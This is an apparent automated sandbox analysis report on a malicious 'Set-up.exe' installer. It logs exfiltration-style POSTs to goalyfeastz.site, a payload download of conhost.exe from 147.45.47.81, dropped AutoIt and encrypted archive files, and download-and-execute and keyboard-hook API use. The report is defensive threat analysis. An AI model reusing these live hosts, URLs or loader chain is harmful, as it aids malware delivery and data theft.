    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12865Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15111Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19969Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7140Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7108Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1141Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 120Host: goalyfeastz.site
    Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E41280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,Concurrency::cancel_current_task,33_2_00E41280
    Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
    Source: global trafficDNS traffic detected: DNS query: IPhwvmMSERoGGfvkQaPBYqP.IPhwvmMSERoGGfvkQaPBYqP
    Source: global trafficDNS traffic detected: DNS query: servicedny.site
    Source: global trafficDNS traffic detected: DNS query: seallysl.site
    Source: global trafficDNS traffic detected: DNS query: opposezmny.site
    Source: global trafficDNS traffic detected: DNS query: goalyfeastz.site
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: goalyfeastz.site
    Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Installer.exe.31.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Set-up.exe, 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
    Source: X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
    Source: X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
    Source: Installer.exe.31.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t
    Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
    Source: X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
    Source: Installer.exe.31.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#
    Source: Installer.exe, Installer.exe, 00000021.00000002.4017846079.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 00000021.00000000.3736123442.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe.31.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3
    Source: Installer.exe, 00000021.00000002.4017846079.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe, 00000021.00000000.3736123442.0000000000E54000.00000002.00000001.01000000.0000000A.sdmp, Installer.exe.31.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr
    Source: Set-up.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: Installer.exe.31.drString found in binary or memory: http://ocsp.comodoca.com0
    Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Installer.exe.31.dr, X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
    Source: Set-up.exe, 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
    Source: X0JA3EDV7BU5B3IH21ST0OE852AR.exe, 00000010.00000000.3684789428.0000000000423000.00000002.00000001.01000000.00000007.sdmp, X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Limitations.pif, 0000000B.00000000.2200334216.0000000000659000.00000002.00000001.01000000.00000006.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: Set-up.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: Installer.exe.31.dr, X0JA3EDV7BU5B3IH21ST0OE852AR.exe.11.drString found in binary or memory: https://sectigo.com/CPS0
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Limitations.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: Set-up.exe, 00000000.00000003.2163100883.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, Amazing.0.dr, Limitations.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49985 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49986 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49987 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49989 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49990 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49991 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49992 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49993 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.145.203:443 -> 192.168.2.6:49994 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,0000000016_2_00408DBB
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Towers entropy: 7.99699264125Jump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Lil entropy: 7.99739487213Jump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Based entropy: 7.99741371865Jump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Labeled entropy: 7.99788385838Jump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Current entropy: 7.99773050006Jump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Endless entropy: 7.99802418462Jump to dropped file
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\Warren entropy: 7.99769995894Jump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\506033\W entropy: 7.99963669576Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile created: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe entropy: 7.99025994987Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99990891734Jump to dropped file
    Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99990891734Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_11.zip entropy: 7.99835792426Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_10.zip entropy: 7.9981501316Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_9.zip entropy: 7.99813249146Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_8.zip entropy: 7.99813033813Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9981238731Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99811336541Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip entropy: 7.99815544419Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip entropy: 7.99815706988Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip entropy: 7.99815492083Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip entropy: 7.99814592157Jump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip entropy: 7.99813308988Jump to dropped file

    System Summary

    barindex
    Source: file.bin.16.drZip Entry: encrypted
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_001196AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,20_2_001196AC
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
    Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\TestedJanuaryJump to behavior
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040497C0_2_0040497C
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406ED20_2_00406ED2
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004074BB0_2_004074BB
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00405BFC16_2_00405BFC
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040B0E016_2_0040B0E0
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040B0E416_2_0040B0E4
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0041997316_2_00419973
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040A90016_2_0040A900
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040A27016_2_0040A270
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040AC2016_2_0040AC20
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00409C2016_2_00409C20
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040D48016_2_0040D480
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0040ED0016_2_0040ED00
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00409DD016_2_00409DD0
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_0041960116_2_00419601
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_004196DB16_2_004196DB
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: 16_2_00418F4016_2_00418F40
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0013F13E20_2_0013F13E
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0013545820_2_00135458
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_001324C020_2_001324C0
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_001347AC20_2_001347AC
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0015881720_2_00158817
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00120DCC20_2_00120DCC
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0011B11420_2_0011B114
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0011F1B420_2_0011F1B4
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0012C27820_2_0012C278
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0015352820_2_00153528
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0014257820_2_00142578
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0014066E20_2_0014066E
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0013D66C20_2_0013D66C
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0012D85820_2_0012D858
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0013694C20_2_0013694C
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_001499B820_2_001499B8
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_001549A520_2_001549A5
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_001479DC20_2_001479DC
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0014FA0C20_2_0014FA0C
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0015DA3020_2_0015DA30
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0015DC1120_2_0015DC11
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00127C6820_2_00127C68
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00128CA820_2_00128CA8
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0015DD0020_2_0015DD00
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00136E0820_2_00136E08
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00118F1820_2_00118F18
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0012AF5820_2_0012AF58
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4128033_2_00E41280
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E5122C33_2_00E5122C
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E5134C33_2_00E5134C
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4134933_2_00E41349
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E4542433_2_00E45424
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 33_2_00E527AA33_2_00E527AA
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\506033\Limitations.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe 35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: String function: 00E42330 appears 34 times
    Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 004062A3 appears 58 times
    Source: C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exeCode function: String function: 004029A6 appears 44 times
